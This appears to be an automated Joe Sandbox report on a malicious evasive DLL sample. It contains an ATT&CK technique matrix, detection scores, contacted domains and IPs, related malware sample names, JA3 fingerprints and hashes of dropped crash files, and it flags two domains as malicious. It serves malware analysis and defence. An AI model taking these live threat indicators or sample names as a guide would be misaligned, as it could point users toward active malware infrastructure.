Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Virtualization/Sandbox Evasion1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery23	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6yDD19jMIu.dll	9%	Virustotal		Browse
6yDD19jMIu.dll	5%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.750000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
3.2.rundll32.exe.12b0000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
areuranel.website	7%	Virustotal		Browse
breuranel.website	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://mem.gfx.ms/meversion/?partner=msn&market=en-us"	0%	Avira URL Cloud	safe
https://watson.telemetry.microsoftv	0%	Avira URL Cloud	safe
https://blogs.msn.co	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://web.vortex.d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
msn.com	13.82.28.61	true	false		high
outlook.com	40.97.161.50	true	false		high
HHN-efz.ms-acdc.office.com	52.98.152.242	true	false		high
FRA-efz.ms-acdc.office.com	52.97.137.242	true	false		high
www.msn.com	unknown	unknown	false		high
www.outlook.com	unknown	unknown	false		high
areuranel.website	unknown	unknown	true	7%, Virustotal, Browse	unknown
breuranel.website	unknown	unknown	true	7%, Virustotal, Browse	unknown
outlook.office365.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre	false	high
https://outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre	false	high
https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=en-us"	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://watson.telemetry.microsoftv	WerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZ	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp	false		high
http://ogp.me/ns#	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	false		high
https://blogs.msn.co	loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://blogs.msn.com/	loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us//api/modules/fetch"	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	false		high
http://ogp.me/ns/fb#	loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	false		high
https://web.vortex.d	loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.98.208.66	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
40.97.161.50	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.98.152.242	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.9.178	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
52.97.137.242	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.82.28.61	msn.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	500309
Start date:	11.10.2021
Start time:	22:47:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6yDD19jMIu.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@14/12@14/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.2% (good quality ratio 17.4%) Quality average: 79% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 73% Number of executed functions: 88 Number of non-executed functions: 202
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.139.176.199, 95.100.218.79, 95.100.216.89, 13.107.42.16, 13.107.5.88, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.49.157.6, 131.253.33.203, 2.20.178.18, 2.20.178.24, 20.189.173.20, 104.208.16.94, 52.184.81.210, 20.199.120.182, 40.112.88.60 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, a767.dspw65.akamai.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, l-0007.config.skype.com, icePrime.a-0003.dc-msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:50:08	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
52.98.208.66	B6VQd36tt6.dll	Get hash	malicious	Browse
40.97.161.50	6yDD19jMIu.dll	Get hash	malicious	Browse
	B6VQd36tt6.dll	Get hash	malicious	Browse
	test1.dll	Get hash	malicious	Browse
	6.dll	Get hash	malicious	Browse
	6101135878f66.dll	Get hash	malicious	Browse
	a9FUs89dWy.dll	Get hash	malicious	Browse
	609a460e94791.tiff.dll	Get hash	malicious	Browse
	13fil.exe	Get hash	malicious	Browse
	24messag.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	66documen.exe	Get hash	malicious	Browse
	9messag.exe	Get hash	malicious	Browse
52.98.152.242	611237846402f.dll	Get hash	malicious	Browse
40.101.9.178	uT9rwkGATJ.dll	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	https://grandmaster.tempors.com/	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
outlook.com	P2AN3Yrtnz.exe	Get hash	malicious	Browse	40.93.212.0
	Hm7d40tE44.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.W32.AIDetect.malware2.21009.exe	Get hash	malicious	Browse	104.47.53.36
	in7BcpKNoa.exe	Get hash	malicious	Browse	40.93.212.0
	aXNdDIO708.exe	Get hash	malicious	Browse	104.47.53.36
	vhPaw5lCuv.exe	Get hash	malicious	Browse	40.93.212.0
	5sTWnI5RoC.exe	Get hash	malicious	Browse	40.93.207.0
	57wF9hu0V5.exe	Get hash	malicious	Browse	40.93.207.0
	7zxmUw3Ml1.exe	Get hash	malicious	Browse	104.47.53.36
	Nh1UI4PFGW.exe	Get hash	malicious	Browse	52.101.24.0
	rEYF2xcbGR.exe	Get hash	malicious	Browse	40.93.207.1
	G2Shy4flZe.exe	Get hash	malicious	Browse	40.93.207.1
	2nqVnWlyLp.exe	Get hash	malicious	Browse	52.101.24.0
	nFkQ33d7Ec.exe	Get hash	malicious	Browse	104.47.53.36
	QE66HWdeTM.exe	Get hash	malicious	Browse	40.93.207.0
	2H69p1kjC4.exe	Get hash	malicious	Browse	40.93.207.1

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	6yDD19jMIu.dll	Get hash	malicious	Browse	13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	52.97.183.162
	P2AN3Yrtnz.exe	Get hash	malicious	Browse	40.93.212.0
	b3astmode.x86	Get hash	malicious	Browse	72.154.237.78
	b3astmode.arm7	Get hash	malicious	Browse	20.153.181.154
	b3astmode.arm7-20211011-1850	Get hash	malicious	Browse	20.63.129.213
	TNIZtb3HS3.exe	Get hash	malicious	Browse	20.42.65.92
	PROFORMA INVOICE -PI6120..html	Get hash	malicious	Browse	40.101.62.34
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.168.117.173
	ntpclient	Get hash	malicious	Browse	21.215.78.72
	2021catalog-selected products.xlsm	Get hash	malicious	Browse	13.92.100.208
	K6E9636Koq	Get hash	malicious	Browse	159.27.209.248
	setup_x86_x64_install.exe	Get hash	malicious	Browse	20.42.73.29
	Hm7d40tE44.exe	Get hash	malicious	Browse	104.47.53.36
	mixsix_20211008-150045.exe	Get hash	malicious	Browse	20.189.173.22
	SecuriteInfo.com.W32.AIDetect.malware2.21009.exe	Get hash	malicious	Browse	104.47.53.36
	in7BcpKNoa.exe	Get hash	malicious	Browse	40.93.212.0
	xiaomi-home.apk	Get hash	malicious	Browse	104.45.180.93
	canon-camera-connect.apk	Get hash	malicious	Browse	104.45.180.93
MICROSOFT-CORP-MSN-AS-BLOCKUS	6yDD19jMIu.dll	Get hash	malicious	Browse	13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	52.97.183.162
	P2AN3Yrtnz.exe	Get hash	malicious	Browse	40.93.212.0
	b3astmode.x86	Get hash	malicious	Browse	72.154.237.78
	b3astmode.arm7	Get hash	malicious	Browse	20.153.181.154
	b3astmode.arm7-20211011-1850	Get hash	malicious	Browse	20.63.129.213
	TNIZtb3HS3.exe	Get hash	malicious	Browse	20.42.65.92
	PROFORMA INVOICE -PI6120..html	Get hash	malicious	Browse	40.101.62.34
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.168.117.173
	ntpclient	Get hash	malicious	Browse	21.215.78.72
	2021catalog-selected products.xlsm	Get hash	malicious	Browse	13.92.100.208
	K6E9636Koq	Get hash	malicious	Browse	159.27.209.248
	setup_x86_x64_install.exe	Get hash	malicious	Browse	20.42.73.29
	Hm7d40tE44.exe	Get hash	malicious	Browse	104.47.53.36
	mixsix_20211008-150045.exe	Get hash	malicious	Browse	20.189.173.22
	SecuriteInfo.com.W32.AIDetect.malware2.21009.exe	Get hash	malicious	Browse	104.47.53.36
	in7BcpKNoa.exe	Get hash	malicious	Browse	40.93.212.0
	xiaomi-home.apk	Get hash	malicious	Browse	104.45.180.93
	canon-camera-connect.apk	Get hash	malicious	Browse	104.45.180.93

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	6yDD19jMIu.dll	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	B6VQd36tt6.dll	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	aVFOmbW2t7.dll	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	gxJ83rJkgw.msi	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	yR4AxlwcWJ.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	BsyK7FB5DQ.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	SGfGZT66wD.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	uT9rwkGATJ.dll	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	XK1PLPuwjL.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	pHEiqE9toa.msi	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	SecuriteInfo.com.W32.AIDetect.malware2.24481.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	vH0SHswvrb.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	NM0NyvZi8O.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	yOTzv1Qz0n.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	SWaTAV7EdD.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	SKMC07102021.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	50r72IVfM0.msi	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.98.208.66 40.97.161.50 52.98.152.242 40.101.9.178 52.97.137.242 13.82.28.61

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_00b0a647\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12044
Entropy (8bit):	3.7642068300312155
Encrypted:	false
SSDEEP:	192:iHiL0oXzHBUZMX4jed+x/u7saS274It7cF:SiVXzBUZMX4jec/u7saX4It7cF
MD5:	731DA60D71432CA663B1FDB49265A20A
SHA1:	9C0CFA5DF7944AD7166177790882FA3272752727
SHA-256:	0BD961F31FA68DC24A3ADA2BEAB0AE6165B3526DE4387C381F0BAF37E3D6DCDB
SHA-512:	F7F1876955A8551D510CDB8BCDE5CF73E5B689FA94669A6BA80E61A22E86831EA80B0B640521F7D58FF829161DB05609D0BF4B59AFF3B870E5DE97F24CFA2A57
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.1.9.8.6.2.7.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.5.3.0.0.2.5.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.a.9.8.f.6.-.3.7.a.6.-.4.2.4.c.-.b.d.2.e.-.6.6.6.3.f.8.4.f.5.b.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.a.a.7.4.6.3.-.f.a.4.d.-.4.6.2.2.-.b.c.f.c.-.e.e.b.6.4.b.1.2.3.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.0.-.0.0.0.1.-.0.0.1.6.-.c.c.3.3.-.3.e.c.7.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_02b4adf8\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12042
Entropy (8bit):	3.7639943799025555
Encrypted:	false
SSDEEP:	192:r+iX0oX1HBUZMX4jed+5/u7saS274It7cEP:6ipXlBUZMX4jeU/u7saX4It7cEP
MD5:	D70C550DA76D4F808A527773BECBB074
SHA1:	B25F1C1DA411A3DCEF49B73BC09C54F7B1314AA1
SHA-256:	DBA73B5AA4F095E9E528110B199DB20D16FEC947A77D6739678BF8C829B13B9A
SHA-512:	96B6A44FF34FCC16DB3768D84CD9EFD9CA382BEE893F0EF581090249BEB3B40C090C1255D7E1519192D6639ED7F4B6FDA4608B77F0D07C91FB4F03A0F64EF57E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.0.5.1.5.1.7.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.7.1.7.1.3.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.5.7.a.a.e.5.-.d.d.5.a.-.4.b.8.d.-.9.5.4.a.-.b.b.b.2.5.9.4.d.f.f.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.7.b.0.9.0.d.-.3.f.7.c.-.4.9.e.8.-.a.f.6.0.-.4.e.f.1.c.4.8.f.4.d.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.4.8.-.0.0.0.1.-.0.0.1.6.-.5.a.4.7.-.8.c.c.9.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_0958cc8c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12044
Entropy (8bit):	3.7651467727075087
Encrypted:	false
SSDEEP:	192:23ihS0oXqHBUZMX4jed+5/u7saS274It7cx:2iyXCBUZMX4jeU/u7saX4It7cx
MD5:	0A3EA743E9398450836E8532348F36CC
SHA1:	33729B785B208ACA681F2DF8549CBFE1B8532C85
SHA-256:	F090C9D54A4A54E7891B1E71D7C2689704CB0B2CCBE13E5353B9AF4071BBD4AD
SHA-512:	E4A2DA4BACD71789C3D853D45F59E7991E83455952302536B38EBC4AD4A44149C7153A1D374ABBF064D4F791F901D86FE9563A18B0C906485A084AA7536892A1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.9.7.4.9.3.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.4.5.5.9.3.0.4.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.3.0.3.1.1.9.-.3.b.b.f.-.4.b.e.e.-.8.2.5.7.-.4.6.4.a.1.5.1.8.8.5.a.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.3.f.6.3.3.9.-.6.d.c.7.-.4.2.f.c.-.8.6.4.4.-.b.0.5.f.5.b.8.5.e.f.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.1.-.0.0.1.6.-.9.e.b.d.-.4.6.c.e.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:24 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35728
Entropy (8bit):	2.3895420553113427
Encrypted:	false
SSDEEP:	192:QEcWzMrXhUhWtMdHuIQLGSV2gDXC7pVjepVSUnyfzLzn:wWzMNUw2dHYLRV9S7pJe+UmXn
MD5:	C980BDF6B563D30FA312FD9BF6191F93
SHA1:	A451988E0042DAB59BD4D52EC5312CBCB9FD969C
SHA-256:	48ADC678ADA085ED6794FAAA554FD49664350BFFBDEAFE633BF13BA0E324BE66
